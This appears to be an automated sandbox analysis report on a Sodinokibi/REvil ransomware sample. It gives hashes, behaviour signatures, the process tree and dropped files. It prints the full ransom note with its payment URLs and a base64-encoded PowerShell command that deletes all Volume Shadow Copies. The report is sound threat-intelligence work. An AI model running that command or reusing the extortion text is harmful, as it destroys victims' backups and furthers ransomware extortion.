Overview

overview

10

Static

static

10

6844bdb8fc...18.exe

windows7-x64

10

6844bdb8fc...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    135s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 18:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6844bdb8fc61ede9a4ad6122721c8c71_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    6844bdb8fc61ede9a4ad6122721c8c71

  • SHA1

    19f0c1511b39be9951a2e9180721748cb3ccd389

  • SHA256

    926a003f4877c7a6388cf753dd4c392902fb1fe9c1ce17151446e8056b55b0d1

  • SHA512

    6f1a36e723a2d280458beabd77b7377796bfaf8059019b0160af1ecce190adbed8e991e5f8016a5c2ed92d26f6b6132149f1412a5c3216e6b7a8756b2c8c88e6

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QuDHQdCer:ZJ0BXScFy2RsQJ8zguDHP

Score
10/10
sodinokibipersistenceransomware

Malware Config

Extracted

Path

C:\Users\qt6p17-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension qt6p17. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D795CAAFADA2BEB2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/D795CAAFADA2BEB2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: K8Sf4solvicGr5EC9+HpJ0YlZhW8PhNrx4eZd1JQQapzcer2aqtytz/z+7epMXR5 G5bIOLudJZCmhILxvQlMeu5TtCxTWzdo41UINyYcRU8b6HQJzvfasr5aAlLlkCR4 O36/fD0plodFaNfaF7gVmrfeZDI2yP/aHuUGGlqZyYCAi9Z0wutjJkeNTxFnJfWP zzC3C0V2bdRccYNghLsXfmUdVSUQOkUG3DjIx/r/AKVSE56iSni/T+xyNjYOrAsv qbVcF8n9w7Jlq18L+wRcUnxAxGFRe9WNJuctvdxPA+uDy0z8JRe1psw0y4hKIdR7 lSBQF6ollY9dgn5uu6S21YNUaHjYOSBTMsju5VgYWz2BxpnYi7eUO2Tmx5Vs0w+R l8gnfuGG5F9QXJmmqCTyVg/AE+bKaDJph9G1lTedsbgBONUSerap+HpMj4wjT7CA 4KerUdmmr8JZvqLoxyMcPrqSnutrp8iC3EsLNn804i7sb9DC6qUpOAKoXf7W9Ny7 0eCwkt04mjmYVxQEvrBv1VB4WRj1O22XLcT+7yh7fHiZcS+gF9O7ott6csXKS2Hq /436DUWSJFH7eZd3ozVW1v5q0GSGV/eSzClPjJm4zdb9AXcYSdG49U1Ukld+mmTh FW86gbXeABI3RQT3hO26JEy7mFtlMnoMLXXjDmJWR1Oqed/KhX7JyE7xg4K2IAyb hrnJIxvpLV+duC4UsP52QpGbGh0NUekmzwQ3noLuSyoP4Yhf5RM7UqwDQXhiU7R3 bSRwvASElJruIxwG/nrokeD2mPmSHFmLM5pS7N9YNXNGfxOfTs/abEKcC+2YWDb+ IDcQ5RIO2EWdyB5moceCZCeEO1zeg/n02GPJjyhv7eJGLThhTsfdLObpl5OaXDW4 CiLSiEyGslNU/47PNFlbriQqhqLxS7LSdfBZJl7rqRkKCrO6DRcVYHN2t1j4UbhJ +X1Wy9RRdOlSLKSxF8zhjyYb+aT01NWd/Cvfl4+q9HCNBAoaBErvjvaYiTy/AYuJ uiziWuiL+ErwiUmwUi6Xpm3P48uYp+IMi1oey7emQ3fJ6HA0Gzpiw6H0pmQ4eI5D BU2MNzL2L0FE4lWaTTuayGDCsIwyXr2rx+GsKswMB03SvrF/41jGBmiEgf583lF/ wp4kocW5aL7I25ViUvl9c1TU5S2hzKkWhbYdjUxbQwczfoPsCHCBfy3oXwD6GaxP FwAWROfXQmvS3oFVNAfSrTwIE0G72s74yNB6oT2V9bOw1/+e+zvA+VhnAp1WhtaD Udx9odX709Z7tlmGsdwqb1Li67xJYURQYm4vGzmgmX9VO6lDCGnaIXFBp/NZvbAy 969Xqey3bGtZ9Tj7NYv01RMj6cHYLGEj/tLehsoc4LSnYtSJAag= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D795CAAFADA2BEB2

http://decryptor.cc/D795CAAFADA2BEB2

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 13 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\6844bdb8fc61ede9a4ad6122721c8c71_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\6844bdb8fc61ede9a4ad6122721c8c71_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1840
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:316
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4792

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0p3lqsme.2sz.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\qt6p17-readme.txt
      Filesize

      6KB

      MD5

      b6958178508b02cdfeb4050c4d6f38bf

      SHA1

      0666ce25653a8df8adf1c04cd65784cdc670379f

      SHA256

      b534f88526cdf627d5501eadcb0b383c34e8688836262f49a049513e4e22a802

      SHA512

      5711a048643325e02bfef4d667e8139c61ce10085b9800262fc5fc6c0787d20bcd3329ac37723173fbee2e52adc7415a824d264cde746ab2eaca6a70b32f4b1d

      Download Submit

    • memory/1840-0-0x00007FFCA6DD3000-0x00007FFCA6DD5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1840-1-0x000001AC3A030000-0x000001AC3A052000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1840-11-0x00007FFCA6DD0000-0x00007FFCA7891000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1840-12-0x00007FFCA6DD0000-0x00007FFCA7891000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1840-15-0x00007FFCA6DD0000-0x00007FFCA7891000-memory.dmp

      Filesize

      10.8MB

      Download